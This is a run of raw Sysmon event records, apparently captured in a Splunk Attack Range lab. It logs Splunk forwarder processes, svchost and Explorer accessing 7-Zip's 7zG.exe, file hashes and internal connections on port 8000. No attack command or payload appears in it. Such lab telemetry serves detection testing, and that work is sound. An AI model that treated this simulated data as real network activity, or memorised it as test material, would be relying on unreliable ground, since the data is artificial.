10:55:51.394{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-12B7-6216-8004-000000003902}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217560Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.394{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12B7-6216-8004-000000003902}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217559Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:51.395{4F8D34B0-12B7-6216-8004-000000003902}2696C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217574Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:52.832{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=747CB4FDDD08306F8EC5F026A89F0341,SHA256=79AFB31DC7CD4AAC78E1B7787F58637AACB05748EFE3953FD268236FA6CE8EB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:52.353{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7CB9701D7EEFDC594E02CFFDBEC01C5,SHA256=1DD58CFBC1242B4B5E87636903C23A4CF123F48D90877492B722D10EE2393ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217573Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:52.425{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2BD991CA9753D6E3C84B31B86DB2D754,SHA256=008328C931C136E1CFCE72FFBD8E215480B53CC9060880C087FA5F3367A306DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217575Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:53.988{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2AF80F1B61714913419E3B798DDB95B,SHA256=C07DE6778557EBA33830ABFC8A165AA4D6844D8D2EEA81A13B0FBBF885640B8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:53.370{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCB4E0A54C9A33B37621D5DB6417EBDF,SHA256=9AC639E2D25648B53AF8AEEFA3DBC1F4BF74E9F93BC09E05ECA61C9819AA4976,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:54.370{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2B3E3D34B97CFF366F1FB5EA1455F221,SHA256=9D0F27C87EF167FD04E0A7CA8BDF2AD0F311EF07F938FB7EA23ACA77EA503540,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217576Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:52.638{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51401-false10.0.1.12-8000- 354300x8000000000000000289787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:51.659{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53549-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000289789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:55.385{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=21163ADD2C787B1070D5014C06FA1107,SHA256=286EF27E6FECA964DC4EC33590B57AC49B2AEBBE0FC68896CF33565CE161C962,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217577Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:55.003{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28C1B422422C7C559F8E9B62462BADCB,SHA256=8B0EBBB376A476CB4AFDFB6AD908FC328261409D9257680A2C3F868059EF90D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:56.385{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E3403AAA0FB7FD77A311ECA9CD02559,SHA256=A2D0E24FC164D8E184006D743CF67F19111D875312E14640C4FA2CDA6B8707E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217578Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:56.019{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCC03AE38BA4BB64647C4AF17AE8F556,SHA256=2CC1BF3A201C2CEA3D3F738D6FA3A9AC749955252D8407CFAF42D1AD416D4E66,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289795Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:57.616{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289794Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:57.616{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289793Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:57.616{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289792Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:57.616{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2B00-000000003802}2012C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000289791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:57.401{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABA3878AB64EA59C36E2E2A8E66D16B4,SHA256=C89758F6A6F0F2DAA4A6F72861887D135D333A5F32B8D301C8E90151BB43BFE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217579Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:57.050{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41F2D32FC7C81AED660D1561404CE2D1,SHA256=A5486818AAEFB10718F7B0087482F16F7A529B12DF8C0F348EE26559C60668A1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217580Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:58.081{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7755D2D07E192E8394776B8EDB5CE68,SHA256=3C84943BAB302ABD05C576BD675F5B56E3C28AE5327A6B0AA7A33DD874C8D435,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289796Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:58.401{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3522C1569BF65ABE74AFDAF75359EB34,SHA256=9E256C832A86AADCE9204CC0357EE29ACAF49B4A61F800FE1E05B84C04C26893,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289797Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:59.452{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A95D5723512013F1616541878896C4A,SHA256=5EA0BBF6EE65D6F31FA59D91DD306651B0CB00D1CD00D43A31CA6F428E78A789,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217581Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:59.284{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8911BB26315FE53DE35D43FCA0766C9D,SHA256=6F6DAC87C27F13D4E30E57E8EBE67CFBC045465E191B278A5BAF5DE57E70E382,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000289827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.705{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=699D89A7059E047D903A8BBE61EBA5F3,SHA256=8DA32D9D1E31F2D06C10A960A51BB92BAA6D49B5576E60278C41F6649E872119,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217583Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:55:57.699{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51402-false10.0.1.12-8000- 23542300x8000000000000000217582Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:00.315{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A837A7BADA0B8BBA3AE066FBFB17ECFB,SHA256=8CF269F306FE3BAB4ED03E4BA5482B3AAFCC0B6A7B507FA62A322EE25BF91CC8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000289826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.372{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.288{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.288{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.288{C8EA50B7-F2AD-6215-C000-000000003802}48565124C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.288{C8EA50B7-F2AD-6215-C000-000000003802}48563616C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.288{C8EA50B7-F2AD-6215-C000-000000003802}48563616C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.288{C8EA50B7-F2AD-6215-C000-000000003802}48563616C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.288{C8EA50B7-F2AD-6215-C000-000000003802}48563616C:\Windows\Explorer.EXE{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000289818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:55:57.707{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53550-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000289817Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:00.273{C8EA50B7-F2AD-6215-BB00-000000003802}44884564C:\Windows\system32\taskhostw.exe{C8EA50B7-12BF-6216-4105-000000003802}5552C:\Program Files\7-Zip\7zG.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000289816Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 